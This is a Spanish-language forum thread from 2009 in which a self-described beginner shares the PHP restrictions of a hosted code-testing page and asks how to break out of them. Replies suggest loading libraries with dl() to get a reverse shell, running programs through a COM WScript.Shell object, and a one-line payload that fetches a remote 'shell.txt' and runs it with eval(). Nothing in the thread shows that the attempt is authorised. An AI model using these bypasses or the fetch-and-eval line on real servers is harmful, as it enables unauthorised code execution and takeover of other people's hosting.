Local File Inclusion ???

Iniciado por APOKLIPTICO, 21 Mayo 2009, 00:01 AM

0 Miembros y 1 Visitante están viendo este tema.

APOKLIPTICO

Reescribo este mensaje para reorganizar la info a ver si me pueden ayudar:
Tengo una pagina de esas q te dejan probar el codigo fuente, entonces pense en tratar de hacer una local file inclusion (creo q es este caso).

Bueno estos son los datos q tengo:
- Es un PHP 5.1.2.
- No me deja usar Include.
- disable_functions =    system, shell, exec, system_exec, shell_exec, mysql_pconnect, passthru, popen, proc_open, proc_close, proc_nice, proc_terminate,
- include_path =   .;E:\php5\ext;E:\php5\PEAR;E:\php5\PhpCommon
- open_basedir = .;I:\(Carpeta)\webphpmyadmin;I:\(carpeta);E:\Windows\temp;E:\php5\PhpCommon;I:\(Carpeta)\phpapps\
- Safe_mode = off.

Alguien me puede dar una mano? hace bastante q estoy tratando pero ya me quede sin ideas...

Un abrazo
APOKLIPTICO
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

WHK

prueba dl() para incluir librerías que te lanzen una shell inversa.

también puedes probar eto:
$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("notepad.exe", 7, false);

fuente:
http://cl.php.net/exec

también..
exec() - Ejecutar un programa externo
passthru() - Ejecutar un programa externo y mostrar la salida pura
popen() - Abre un apuntador de archivo de proceso
pcntl_exec() - Ejecuta un programa específico en el espacio de proceso actual

veo que te restringen mysql_pconnect() pero no mysql_connect().

s E t H


APOKLIPTICO

Cita de: WHK en 21 Mayo 2009, 04:11 AM
prueba dl() para incluir librerías que te lanzen una shell inversa.

también puedes probar eto:
$WshShell = new COM("WScript.Shell");
$oExec = $WshShell->Run("notepad.exe", 7, false);

fuente:
http://cl.php.net/exec

también..
exec() - Ejecutar un programa externo
passthru() - Ejecutar un programa externo y mostrar la salida pura
popen() - Abre un apuntador de archivo de proceso
pcntl_exec() - Ejecuta un programa específico en el espacio de proceso actual

veo que te restringen mysql_pconnect() pero no mysql_connect().

Que es dl()???
Y lo segundo q me pusiste que es???
exec, passthru() y popen() no me los deja ejecutar, pero pcntl_exec() puede ser q si...

Cita de: s E t H en 21 Mayo 2009, 04:47 AM
podes usar fopen() y eval()
http://ar.php.net/function.fopen
http://ar.php.net/eval

Fopen() me los deja usar y eval() tambien, el primero lo use para leer los archivos de los paths que me deja abrir, pero para q me serviria el eval()???
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

s E t H

eval() ejecuta un codigo php
asi abris la shell o lo que quieras con fopen y lo ejecutas con eval

APOKLIPTICO

Okay, aparentemente no reconoce la funcion pcntl_exec(), asi que me queda eval(), popen() y mysql_connect(), que hago con eso? sorry gente pero estoy re newbie tanto en php como en LFI.
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

APOKLIPTICO

Nadie sabe como puedo hacer??
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

WHK

Cita de: APOKLIPTICO en 21 Mayo 2009, 20:43 PM
Okay, aparentemente no reconoce la funcion pcntl_exec(), asi que me queda eval(), popen() y mysql_connect(), que hago con eso? sorry gente pero estoy re newbie tanto en php como en LFI.

Código (php) [Seleccionar]
<?php eval(file_get_contents('http://web/shell.txt')); ?>

benny_loppa

i dont speak spanish, i hope is not a problem that im writing in english

from what i've read up you want to do a local file inclusion, i think the best way to do a local file inclusion it's including you files with fopen,require,include,file_get_contents, but be carefull because fopen and file_get_contents is for lfd(local file disclosure)